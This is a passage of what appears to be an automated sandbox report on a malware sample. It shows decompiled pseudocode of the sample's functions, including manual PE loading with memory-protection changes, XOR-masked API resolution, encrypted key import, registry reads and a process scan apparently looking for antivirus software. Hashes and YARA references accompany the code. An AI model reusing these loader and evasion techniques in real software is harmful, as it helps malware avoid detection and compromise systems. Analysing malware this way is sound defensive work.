				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6C501112( &_v8,  &_v12,  *0x6c5041cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6C501BCB(_t22, _v8,  *0x6c5041cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6C501566(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6c504190, 0, _v8);
				}
				return _t25;
			}

0x6c501c12
0x6c501c15
0x6c501c16
0x6c501c2c
0x6c501c35
0x6c501c3a
0x6c501c53
0x6c501c3c
0x6c501c4f
0x6c501c4f
0x6c501c57
0x6c501c59
0x6c501c61
0x6c501c69
0x6c501c71
0x6c501c73
0x6c501c73
0x6c501c71
0x6c501c83
0x6c501c83
0x6c501c8e

APIs

StrStrIA.KERNELBASE(00000000,6C501810,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501C69
HeapFree.KERNEL32(00000000,?,?,6C501810,?,00000000,00000000,?,?,?,6C501810), ref: 6C501C83

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 2708b5634ef4928896a2649fc71cd85c5339eb46499b8940106e92b6cd42b76d
Instruction ID: 5512cd01bb9294e13f213021b15dee0a2c57b59770acee38881905455e5f651b
Opcode Fuzzy Hash: 2708b5634ef4928896a2649fc71cd85c5339eb46499b8940106e92b6cd42b76d
Instruction Fuzzy Hash: 71018F76B01514EBCB008BA5CD44E9F77BDAB99648F110166EA05E3500EB30DE0097A5

Uniqueness

Uniqueness Score: -1.00%

Function 6C53BBD0, Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,000030FF,00000040,6D568EE0), ref: 6C53BC44

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
Instruction ID: c99ef4ebb9da80943dbb46524bd1d57d40bcbcf57b470a9b152e74a9ebbec468
Opcode Fuzzy Hash: ef85b2c8b16b7eeccdd6cb1618c8f98459a59675dd5bc257ceef3dab6fc40e20
Instruction Fuzzy Hash: DA514976B012108FDF04EE69CC917AA3BB5E74E324BDB422AE509D7761E734B448CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00504BFF, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00504BFF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x50a2d0; // 0x2add5a8
				_t4 = _t15 + 0x50b394; // 0x2fe893c
				_t20 = _t4;
				_t6 = _t15 + 0x50b124; // 0x650047
				_t17 = E00507471(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E00504C7C(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x00504c09
0x00504c0b
0x00504c12
0x00504c13
0x00504c14
0x00504c15
0x00504c1b
0x00504c20
0x00504c20
0x00504c2a
0x00504c3c
0x00504c43
0x00504c72
0x00504c45
0x00504c4a
0x00504c6f
0x00504c4c
0x00504c4f
0x00504c56
0x00504c61
0x00504c58
0x00504c5b
0x00504c5b
0x00504c65
0x00504c65
0x00504c4a
0x00504c79

APIs

Part of subcall function 00507471: SysFreeString.OLEAUT32(?), ref: 00507550

Part of subcall function 00504C7C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,005077C1,004F0053,00000000,?), ref: 00504C85
Part of subcall function 00504C7C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,005077C1,004F0053,00000000,?), ref: 00504CAF
Part of subcall function 00504C7C: memset.NTDLL ref: 00504CC3

SysFreeString.OLEAUT32(00000000), ref: 00504C65

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 599b432460b9b4197f2e944c3dff426352fc558065b06959feb3052f2ee1f538
Instruction ID: 94d11ecfb6e9849c42ff7c2f26d4356b1464bc011f0fdae5c9f960a88ceb0ca7
Opcode Fuzzy Hash: 599b432460b9b4197f2e944c3dff426352fc558065b06959feb3052f2ee1f538
Instruction Fuzzy Hash: 10019A7250102ABBEF10ABA8CD488AEBFB8FB48700F004965EA01E20A1D3709E15DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00505C4E, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00505C4E(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x50a290, 0, _a4); // executed
				return _t2;
			}

0x00505c5a
0x00505c60

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a9b0f1f82e43a921271ff7ff0f6b626961ca98314b1ca9a7427387c8053e839e
Instruction ID: 12642524334f57376bb96d991bb924424dc34353cb2bdf95fd0db1c45962f89d
Opcode Fuzzy Hash: a9b0f1f82e43a921271ff7ff0f6b626961ca98314b1ca9a7427387c8053e839e
Instruction Fuzzy Hash: 53B01239404200ABCA024B00DD08F0DBB22B774B00F008020B20840074C2321428FB06

Uniqueness

Uniqueness Score: -1.00%

Function 00502A03, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00502A03(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x50a290, 0, _a4); // executed
				return _t2;
			}

0x00502a0f
0x00502a15

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 87143c1af6866df74f5253b3d7e8f94847620273374c2aa28f2accafa574f470
Instruction ID: 3267051b7024548dd32656e3d3e7f673ca995aa8d0c1c00aa54f3933d90dfc83
Opcode Fuzzy Hash: 87143c1af6866df74f5253b3d7e8f94847620273374c2aa28f2accafa574f470
Instruction Fuzzy Hash: 0DB01235004200EBDE024B00DD0CF0D7B22B7B0B00F008020B2440007482320424FB15

Uniqueness

Uniqueness Score: -1.00%

Function 6C501236, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6C501236(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6c5041cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6c5041cc - 0x63698bc4 &  !( *0x6c5041cc - 0x63698bc4);
				_t18 = E6C501AA5( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6c5041cc - 0x63698bc4 &  !( *0x6c5041cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6c5041cc - 0x63698bc4 &  !( *0x6c5041cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6C5014DE(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6C501F31(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6C501030(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6C50136A(_t42);
					L8:
					return _t29;
				}
			}

0x6c50123e
0x6c501240
0x6c50125c
0x6c50126d
0x6c501274
0x6c5012d2
0x00000000
0x6c501276
0x6c501276
0x6c501280
0x6c501284
0x6c501289
0x6c50128c
0x6c501291
0x6c501295
0x6c50129a
0x6c50129f
0x6c5012a3
0x6c5012a8
0x6c5012a9
0x6c5012ad
0x6c5012b2
0x6c5012ba
0x6c5012ba
0x6c5012b2
0x6c5012a3
0x6c501295
0x6c5012bc
0x6c5012c5
0x6c5012c9
0x6c5012d3
0x6c5012d9
0x6c5012d9

APIs

Part of subcall function 6C501AA5: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6C501272,?,?,?,?,00000002,00000000,?,?), ref: 6C501AC9
Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501AEB
Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B01
Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B17
Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B2D
Part of subcall function 6C501AA5: GetProcAddress.KERNEL32(00000000,?), ref: 6C501B43

Part of subcall function 6C5014DE: memcpy.NTDLL(00000000,00000002,6C501280,?,?,?,?,?,6C501280,?,?,?,?,?,?,00000002), ref: 6C50150B
Part of subcall function 6C5014DE: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6C50153E

Part of subcall function 6C501F31: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6C501F69

Part of subcall function 6C501030: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6C501069
Part of subcall function 6C501030: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6C5010DE
Part of subcall function 6C501030: GetLastError.KERNEL32 ref: 6C5010E4

GetLastError.KERNEL32(?,?), ref: 6C5012B4

Memory Dump Source

Source File: 00000000.00000002.917927318.000000006C501000.00000020.00020000.sdmp, Offset: 6C500000, based on PE: true

Associated: 00000000.00000002.917919744.000000006C500000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917946267.000000006C503000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.917967600.000000006C505000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.917987894.000000006C506000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 2062bb0565fd470f1f433a6cd90dde6696bf7f975ebd79a03d69eb7a959d2d0b
Instruction ID: f8f1ae78c12fedaae2d600ae9a52c8c623b0a4b6043b3921966c895f01f30279
Opcode Fuzzy Hash: 2062bb0565fd470f1f433a6cd90dde6696bf7f975ebd79a03d69eb7a959d2d0b
Instruction Fuzzy Hash: 35112B76700706ABD7209AAACC80DDB77BCBF8830C704025DE901D7A41E7A0ED0687E2

Uniqueness

Uniqueness Score: -1.00%

Function 005030AD, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E005030AD(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E00504BFF(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E00505419(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x50a290, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x005030b5
0x0050310a
0x0050310f
0x005030b7
0x005030d1
0x005030d5
0x005030da
0x005030dc
0x005030ec
0x005030f8
0x005030de
0x005030de
0x005030e1
0x005030e6
0x005030e6
0x005030dc
0x005030d5
0x00503115

APIs

Part of subcall function 00505419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002), ref: 0050545B
Part of subcall function 00505419: RegQueryValueExW.ADVAPI32(80000002,?,00000000,00000000,00000000,65696C43,65696C43,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43), ref: 00505480
Part of subcall function 00505419: RegCloseKey.ADVAPI32(80000002,?,00502115,00000000,80000002,00507319,00000000,00507319,?,65696C43,80000002,00000000,?), ref: 005054B0

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,00504A79,?,004F0053,02FE9338,00000000,?), ref: 005030F8

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: QueryValue$CloseFreeHeap
String ID:
API String ID: 2109406458-0
Opcode ID: 25e20547f4d4875c58021e8ece70dea6601a1babef77f732c09921fe95521a00
Instruction ID: 9c72cfdf10805b00dd55b8f798e1e285bc80b1ac4844d06ed5b550a5bfa0a120
Opcode Fuzzy Hash: 25e20547f4d4875c58021e8ece70dea6601a1babef77f732c09921fe95521a00
Instruction Fuzzy Hash: 5D013C32200249FBCF129F44CC56FAE3F7AFB98350F188429FA198A1A1D771DA24DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00505872, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00505872(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x00505872
0x0050587f
0x00505880
0x00505881
0x00505888
0x005058b6
0x005058b7
0x005058ba
0x005058c0
0x00000000
0x00000000
0x0050589f
0x005058a9
0x005058b0
0x00000000
0x005058a1
0x005058a4
0x005058c4
0x005058a6
0x005058a6
0x00000000
0x005058a6
0x005058a4
0x005058cb
0x005058d1
0x005058d1
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 005058BA

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 32599fa7bd355a2840c4a318bbd1c82e8dde29eb4c19159bf3662a73ef640c12
Instruction ID: 3ade4431e1ab0bf9fa77ba0083c096625f615b8f326b9ff8df3d269bc5758959
Opcode Fuzzy Hash: 32599fa7bd355a2840c4a318bbd1c82e8dde29eb4c19159bf3662a73ef640c12
Instruction Fuzzy Hash: CBF0FF75D01618EFDB00DB94D488AEEBBB8FF04305F2484AAE902A7181E7B46B84DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00501AF1, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00501AF1(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E005035A1( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00505C4E(_a8 + _a8);
					if(_t21 != 0) {
						E00504502(_a4, _t21, _t23);
					}
					E00502A03(_a4);
				}
				return _t21;
			}

0x00501af9
0x00501b00
0x00501b02
0x00501b11
0x00501b18
0x00501b27
0x00501b2b
0x00501b32
0x00501b32
0x00501b3a
0x00501b3f
0x00501b44

APIs

lstrlen.KERNEL32(00000000,00000000,00506301,00000000,?,00505B47,00000000,00506301,?,00000000,00506301,00000000,02FE9630), ref: 00501B02

Part of subcall function 005035A1: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00501B16,00000001,00506301,00000000), ref: 005035D9
Part of subcall function 005035A1: memcpy.NTDLL(00501B16,00506301,00000010,?,?,?,00501B16,00000001,00506301,00000000,?,00505B47,00000000,00506301,?,00000000), ref: 005035F2
Part of subcall function 005035A1: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 0050361B
Part of subcall function 005035A1: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00503633
Part of subcall function 005035A1: memcpy.NTDLL(00000000,00000000,02FE9630,00000010), ref: 00503685

Part of subcall function 00505C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00503FAA), ref: 00505C5A

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 64b49c3c6880a5bb4edba145c84ae38a1a205594f2c6ce8f6b26d975988e7925
Instruction ID: 6be5a9a0ff918e5d60afd0e7a1164ad1b5913f80febddad9dbe3dc16be0e1ec9
Opcode Fuzzy Hash: 64b49c3c6880a5bb4edba145c84ae38a1a205594f2c6ce8f6b26d975988e7925
Instruction Fuzzy Hash: 04F03A76100509BBCF126E55DC09CEF3FADFF853A0F008022FE198A151EA31DA559BA1

Uniqueness

Uniqueness Score: -1.00%

Function 005045E6, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E005045E6(void* __edx, void* __edi, void* _a4) {
				int _t7;
				int _t13;

				_t7 = E00501896(__edx, __edi, _a4,  &_a4); // executed
				_t13 = _t7;
				if(_t13 != 0) {
					memcpy(__edi, _a4, _t13);
					 *((char*)(__edi + _t13)) = 0;
					E00502A03(_a4);
				}
				return _t13;
			}

0x005045f2
0x005045f7
0x005045fb
0x00504602
0x0050460d
0x00504611
0x00504611
0x0050461a

APIs

Part of subcall function 00501896: memcpy.NTDLL(00000000,00000110,00501C1F,00501C1F,?,?,00501C1F,?,?,005024E4,?), ref: 005018CC
Part of subcall function 00501896: memset.NTDLL ref: 00501942
Part of subcall function 00501896: memset.NTDLL ref: 00501956

memcpy.NTDLL(00501C1F,00501C1F,00000000,00501C1F,00501C1F,00501C1F,?,?,005024E4,?,?,00501C1F,?), ref: 00504602

Part of subcall function 00502A03: RtlFreeHeap.NTDLL(00000000,00000000,00504072,00000000,?,?,00000000,?,?,?,?,?,?,005044AE,00000000), ref: 00502A0F

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction ID: 985b0c31904606da139c03143abc3dc54c3220f73aafe6cf1bae9705d2661042
Opcode Fuzzy Hash: 7d9ae11f758df14eb32432736e3baa9f6ba8b53720bad78e7208944919bdcff0
Instruction Fuzzy Hash: 55E0867690011A77CB126A94DC05DEF7F5CAF857D0F044011FE0849141F731C61097E2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6C556F16, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 56COMMON

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6C556F2D
_wcscmp.LIBCMT ref: 6C556F3E
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F5A
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,6C5571DC,?,00000000), ref: 6C556F84

Strings

ACP, xrefs: 6C556F27
OCP, xrefs: 6C556F38

Memory Dump Source

Source File: 00000000.00000002.918041831.000000006C50F000.00000020.00020000.sdmp, Offset: 6C50F000, based on PE: false

Similarity

API ID: InfoLocale_wcscmp
String ID: ACP$OCP
API String ID: 1351282208-711371036
Opcode ID: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
Instruction ID: 814d534386a319738601c17fc51356a5642658c7b1dacc2b3072a1e2ccd1af0b
Opcode Fuzzy Hash: 2a4e325ac02cdef773ad5d00dbd437b3744d9c3fae12dd33acd9744fcb14c10e
Instruction Fuzzy Hash: C7019632619285BBEB008E59DC44FE637B89F05758F508017F504DAA54EF31DA91C795

Uniqueness

Uniqueness Score: -1.00%

Function 005019E7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E005019E7() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x50a2d0; // 0x2add5a8
						_t2 = _t9 + 0x50be04; // 0x73617661
						_push( &_v264);
						if( *0x50a11c() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x005019f2
0x005019fc
0x00501a00
0x00501a0a
0x00501a3b
0x00501a11
0x00501a16
0x00501a23
0x00501a2c
0x00501a43
0x00501a2e
0x00501a36
0x00000000
0x00501a36
0x00501a44
0x00501a45
0x00000000
0x00501a45
0x00000000
0x00501a3f
0x00501a4b
0x00501a50

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 005019F7
Process32First.KERNEL32(00000000,?), ref: 00501A0A
Process32Next.KERNEL32(00000000,?), ref: 00501A36
CloseHandle.KERNEL32(00000000), ref: 00501A45

Strings

8sP, xrefs: 005019E7

Memory Dump Source

Source File: 00000000.00000002.916706763.0000000000501000.00000020.00000001.sdmp, Offset: 00500000, based on PE: true

Associated: 00000000.00000002.916696906.0000000000500000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916723049.0000000000509000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.916729745.000000000050A000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.916741677.000000000050C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID: 8sP
API String ID: 420147892-3124762363
Opcode ID: 102f7ea816ea99114aafa8f6b5441b87e93e3488edae57b9232cb0935dd41764
Instruction ID: 1911ba800a5ed040d122aa3b6c017b5ad5de08598ccdd49dbe044b210aa77a2e
Opcode Fuzzy Hash: 102f7ea816ea99114aafa8f6b5441b87e93e3488edae57b9232cb0935dd41764
Instruction Fuzzy Hash: DEF090366026256BD720A7268C4DEEF7ABCFBD5310F000061FA06D2181EA20D98A86F6

Uniqueness

Uniqueness Score: -1.00%

Function 6C502485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6C502485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6c5041f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
